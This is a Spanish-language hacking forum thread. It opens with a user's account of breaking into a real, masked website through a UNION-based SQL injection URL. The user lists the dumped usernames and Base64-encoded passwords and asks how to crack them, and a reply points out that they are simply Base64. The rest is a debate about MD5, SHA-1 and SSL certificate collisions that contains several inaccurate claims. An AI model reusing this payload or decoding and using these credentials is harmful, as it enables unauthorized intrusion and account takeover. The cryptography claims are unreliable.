Hola compañeros del under...

despues de unas horas y de unos cuantos sqli consegui unos password  de una pagina a la cual tambien encontre el panel de administracion.. lo que hice fue:

http://www.xxxxxxxxx.com/noticia.php?id=-1+union+select+0,1,2,pass,usuario,5,6,7,8+from+usuarios--

y como resultado 

en el orden de  USER PASSWORD

utrero        aXNvMTAw

admin        c3QyMDA5cGNvbWF0ZW8=

fernando       ZmVybmFuZG8=

15francisco15        MjkxMDE5NzE=


he probado varios cosas como paginas online de hash o el cain pero no encuentro en que algoritmo se encuentra.
me confunde el hecho de la longitud de ellos que no son iguales.

si alguien pudiera orientarme agradeceria 

gracias y espero sus respuestas

Saludos

Polyvox

Que tal.

Supistes los campos de la tabla, como injectar.. y no sabes que eso es Base64 encoded????!

 


Saludos.

Los algoritmos criptográficos HASH (más famosos MD5 y SHA-1) no se pueden deshacer hacia atrás (todavía no existe la posibilidad ni de deshacer el algoritmo ni de saber generar otra cadena que genere el mismo hash a uno dado (colisión))...

A ver, hay que estudiar un poco de criptografía para tener conciencia de lo que se está diciendo para afirmar cosas de manera tan segura, no sólo fijarse en artículos noticia.

Por partes:
Lo primero de todo, hay que saber distinguir entre criptografía asimétrica y asimétrica, y saber como funciona el protocolo SSL si se quiere hablar de él.
En SSL (como TLS y otros protocolos basados en criptografía asimétrica) se utiliza la clave pública para cifrar la clave de sesión (es decir el servidor te da su clave pública, cifras la que vas a utilizar de sesión con esta clave pública, mandas esta clave de sesión y el servidor descifra esta clave de sesión con su clave privada), es una mezcla entre criptografía asimétrica y simétrica (se cambia a la simétrica porque es más rápida), la clave de sesión no se ve comprometida como se ve en este punto. Esta clave de sesión es llamada pre-master secret.
Una vez cambiado ya al modo de cifrado elegido ya está fijado el canal cifrado con claves distintas para cifrar en el sentido cliente-servidor de en el servidor-cliente.
El master Secret se saca concatenando una serie de cadenas MD5 y SHA-1 hechas con el Master Secret y aleatorios enviados entre el cliente-servidor (en la fase de saludo), este bloque se parte para obtener las distintas claves con las que cifrarán y firmarán los resúmenes cliente y servidor.

Como ves, ni aún sabiendo deshacer las funciones HASH (cosa que no es posible por mucho que digas tú) serías capaz de hacer un MITM en SSL.

El artículo del enlace (de bastante falta de calidad por cierto) no habla de ninguna falla de MD5, habla de crear un certificado falso y ponerse en medio! O sea no explotar el sistema, si no el usuario (que suele ser el eslabón más debil), o sea es como si escribo un artículo porque el otro día vi a mi amigo como escribía en el teclado la contraseña de hotmail (lo que se suele llamar mirar por encima del hombro) y digo SSL roto!! Un poco de seriedad.


Y también hay que saber de funciones HASH para afirmar que MD5 dejó hace tiempo de ser seguro, cosa que no es así, como repito aunque se hayan encontrado colisiones (que existen las colisiones es cosa lógica y deducible por obligación deben existir para reducir un conjunto infinito de cadenas en cadenas de 128 bits (infinito-->2^128 combinaciones posibles) pero ni se puede deshacer a día de hoy el algoritmo ni se pueden encontrar las cadenas de colisión a una hash dada, digais lo que digais.

Salu2


P.D: Antes de discutir sobre MD5 SSl etc, es indispensable saber como funcionan que tipo de criptografía utilizan y sobre que parte y funcionamiento se está haciendo referencia, para no caer en vaguedades tipo "los certificados digitales comprometidos debido a MD5", "SSL no es seguro debido a MD5", porque que se utilice funciones HASH para firmar determinadas cosas no da para deducir que porque una función hash ya no sirva para cifrar se puede afirmar SSL no es seguro los certificados digitales no sirven y cosas del estilo.

MODIFICADO***: Acabo de releer mas detenidamente el artículo que me has pasado, leí mal creí que hablaba de otra cosa (es bastante ambiguo y no da detalles), al releer me he dado cuenta que creo que se refiere a poder firmar un certificado falso conla firma de la autoridad (CA) que firmó el verdadero, pero lo que el artículo no dice es que la firma de la CA es una función hash del certificado cifrada con la clave privada de la CA .
Lo cual significa que si falla la función hash (cosa que no es posible deshacer sea MD5 o lo que sea) lo que obtienes es el certificado (de hecho lo que se hace en el cliente es descifrar la firma con la clave pública del CA y comparar con el resultado de hacer el hash del certificado), pero no entiendo el sentido de esto (el hash está para firmar no se obtiene nada nuevo deshaciendolo), ahora ya me contarás como haces para firmar el tuyo (igual al servidor pero con clave pública distinta) con la clave privada del CA.
Quizás el artículo se refiere a otra cosa no sé eso es lo que entiendo que quiere decir.
Y es que, los certificados están para garantizar las claves públicas.


Salud2

No no me lo tomo como algo personal, pero tu tampoco te lo tomes como personal porque diga que lo que estás diciendo no tiene ninguna base si es así, no te estoy diciendo que no tengas ni idea ni que tengas la obligación de saberlo, yo tampoco se de muchas cosas pero tampoco me quejo si hablo de algo y me dicen que lo que estoy diciendo no tiene base, no te acuso a tí si no a los argumentos.
Si te pareció molesto sorry no era mi intención pero también entiende que si tú por ejemplo sabes que algo que hay escrito no tiene base o es falso escribas eso mismo, no estoy diciendo nada ofensivo, sólo que para hablar de cosas hay que hacer decir a que punto se hace referencia y sobre que se está hablando. También es cierto y estarás conmigo que en muchos foros la gente para que se toma de forma personal que discutan o pongan en tela de juicio sus argumentos y busque dar una imagen de si misma en un foro de internet cosa que me parece patética, yo no me ofendo si escribo algo y me contestan rebatiendo los argumentos y diciendo que lo que he dicho no tiene base ninguna, entonces tendré que o rebatir los argumentos o mirar de manera crítica si es cierto que no tiene base, pero en ningún caso ofenderme porque no sea "mi verdad".
Porque lo que yo discuto siempre son los argumentos lo demás me da igual.

PD:A día de hoy SSL es seguro al igual que todos los sistemas basados en criptografía asimétrica con clave robusta (aunque SSL o TLS es mezcla de las dos) y lo serán hasta que no se desarrolle un algoritmo lineal para factorizar números primos, al igual que muchas cosas como WPA que por muchas noticias sensacionalistas no es cierto que la seguridad de estas cosas a día de hoy esté comprometida (más bien están comprometidas por otras cosas ajenas al sistema)
Salu2

Que tal.

Yo creo que Novlucker se referia a MD5 directamente, no a SSL.  /*** MD5 SSL para ser mas correctos ***/
Sabemos que MD5 es un one-way hash function, irreversible por ahora.

Ahora podriamos tener en cuenta que desde hace un tiempo, MD5 se ha encontrado "vulnerable" a ataques de colisiones. Por ello, ahora Novlucker creo que implicaba SSL con MD5. ( SSL SHA-1 no es el caso ).

SSL usa claves publicas ( asymetric encryption ), pero como digo creo que Nov se referia al uso de MD5 como algoritmo de Hash usado en dichos certificados, con lo cual se pudo crear un certificado con otro contenido con el mismo hash que el certificado verdadero ( collision ).

Por ende, creo que Nov se refiere a la vulnerabilidad de MD5 SSL.


Saludos.

Salu2
Sí, pensé al principio que se refería en SSL a poder romper la criptografía (en el sentido de descifrar los mensajes) usada en la comunicación entre el cliente y servidor, luego pensé que se refería a falsificar el certificado y así hacerse pasar por el servidor (esto implica más cosas, hacerse pasar por el nombre de dominio del servidor también ya que tiene que coincidir con el dado en el certificado).
Si el tema es intentar encontrar un certificado falso que de la misma hash que el verdadero para que así la firma por la CA sea la misma en ambos casos, se trataría de coger un certificado igual que el servidor pero cambiando el campo de la clave pública (probando números posibles para ser clave pública hasta dar con un certificado con el mismo hash y una clave pública diferente),una vez con una clave pública generada tuya (y la correspondiente privada) hacer creer a la víctima que el nombre de dominio del servidor corresponde con tu máquina y ya así poder establecer una conexión SSL que de cara al usuario  igual a la que establecería con el servidor.

Esto como suena no debe deducirse que es posible debido a haber encontrado colisiones, para empezar una clave pública es un número con una serie de requisitos, habría que probar con el certificado original cambiando el campo clave pública por una tuya (esto implica probar números posibles de ser clave pública en el certificado original hasta dar con un certificado cuyo hash coincida con el original pero clave pública distinta), esto que a día de hoy es inalcanzable (por mucho que hayan encontrado colisiones que haberlas haylas por obligación, el problema es encontrar colisiones de una hash dada) hay que sumarle es esfuerzo que supone ir generando pares de claves(clave privada-clave pública) e ir comrpobando el hash del certificado con estas claves públicas. A día de hoy no es alcanzable que yo sepa (lo único que tengo entendido es que se han encontrado ya colisiones en MD5 pero de ahi a lo anterior hay un mundo bien grande de diferencia).

Cabe distinguir también:
-Tanto SHA-1 como MD5 son funciones hash, tienen la misma función en criptografía unicamente la diferencia es el algoritmo de reducción criptógrafica utilizado.
-No existe SSL con MD5 y SSL con SHA-1, SSL como protocolo es único, lo que si puede haber son certificados digitales cuyo hash firmado por la CA sea un hash MD5 o SHA-1 (certificado que pasa el servidor al cliente para garantizar que es su verdadera clave pública , tambíen puede pasarla el cliente al servidor si lo decide).  SSL utiliza siempre MD5 y SHA-1(utiliza ambas) de la misma manera a la hora de crear el Master key.

Sí el título es conflictivo, pero no se refiere a que exista el MD5 SSL, si no a la posibilidad de poder comprometer los certificados digitales por culpa de MD5 lo que afectaría a SSL (y a muchos protocolos más como las VPN (que utilizan SSL), pero no quiere decir que existan las VPN que utilizan SHA-1 y las que utilizan MD5, si el certificado utiliza SHA-1 no cabe la posibilidad de comprometer ni SSL (que no cabe distinguirlo entre MD5 o SHA-1) ni ningún protocolo que utilice certificados digitales (porque la falla es el certificado no el protocolo) si no que plantea que cabiendo la posibilidad de falisificar un certificado digital se comprometan todos estos protocolos (se comprometería cualquier cosa que utilizase certificados digitales cuya firma es MD5 da igual con que tipo de protocolo utilizases).
O sea quiero decir que por ejemplo no tiene sentido decir tengo un certificado digital cuya firma es un hash SHA-1 y el protocolo utilizado al conectar con el banco es SSL MD5, lo de MD5 o SHA-1 no guarda relación con el protocolo se refiere al certificado.
Añadir también que colisiones hay en cualquier algoritmo hash, sea MD5 SHA-1 o el que sea, ya que a veces se habla de las colisiones como si fueran propio de MD5 o fuera una falla (la falla sería conocer un algoritmo que a partir de un hash te sacase una función que define las colisiones de ese hash (que define las cadenas cuyo hash es ese).
Salu2